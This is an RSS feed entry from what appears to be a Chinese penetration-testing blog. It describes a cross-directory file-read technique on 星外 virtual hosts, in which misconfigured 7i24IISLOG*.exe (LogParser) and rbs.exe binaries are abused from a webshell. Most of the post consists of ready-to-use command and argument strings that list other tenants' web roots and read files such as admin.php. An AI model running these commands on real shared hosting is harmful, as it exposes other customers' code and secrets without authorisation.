<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>星外 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E6%98%9F%E5%A4%96/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Mon, 13 Aug 2018 15:45:32 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>星外虚拟主机跨web目录文件读取技巧</title>
		<link>/web/344.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 28 Jan 2018 11:40:15 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[星外]]></category>
		<category><![CDATA[目录]]></category>
		<guid isPermaLink="false">/?p=113</guid>

					<description><![CDATA[星外虚拟主机跨目录读取文件漏洞，需要一定条件。 详细说明： 问题发生在以下文件，这些文件都没有严格的设置执行权限，当前的IIS用户能够顺利的利用它们执行命令： c:\windows...]]></description>
										<content:encoded><![CDATA[<p><span class="wpcom_tag_link"><a href="/tags/%e6%98%9f%e5%a4%96" title="星外" target="_blank">星外</a></span>虚拟主机跨<span class="wpcom_tag_link"><a href="/tags/%e7%9b%ae%e5%bd%95" title="目录" target="_blank">目录</a></span>读取文件漏洞，需要一定条件。</p>
<p>详细说明：</p>
<p>问题发生在以下文件，这些文件都没有严格的设置执行权限，当前的IIS用户能够顺利的利用它们执行命令：</p>
<pre><code>c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe</code></pre>
<p>其中的<code>7i24IISLOG.exe</code>其实就是<code>LogParser</code>，<code>LogParser</code>是一款强大日志分析工具，下面利用它来列web目录：</p>
<p>在 webshell中</p>
<pre><code>CmdPath:
c:\windows\7i24IISLOG
Argument:
“select top 100 path from e:\host\*.*” -i:FS -rtp:-1</code></pre>
<p>下面读取文件内容：</p>
<pre><code>c:\windows\7i24IISLOG
“select text from e:\host\0233ab\web\admin.php” -i:textline -rtp:-1</code></pre>
<p><code>7i24IISLOG3.exe</code>能够打包ISO文件，利用它同样的也可以列出目录文件信息：</p>
<pre><code>CmdPath:
c:\windows\7i24IISLOG3
Argument:
e:\host\0233ab\web\ c:\windows\temp\123.rar</code></pre>
<p>同样的还有rbs.exe</p>
<pre><code>CmdPath:
c:\windows\rbs -r -v 024dbjj
Argument:
e:\host\0233ab\web\*.*</code></pre>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
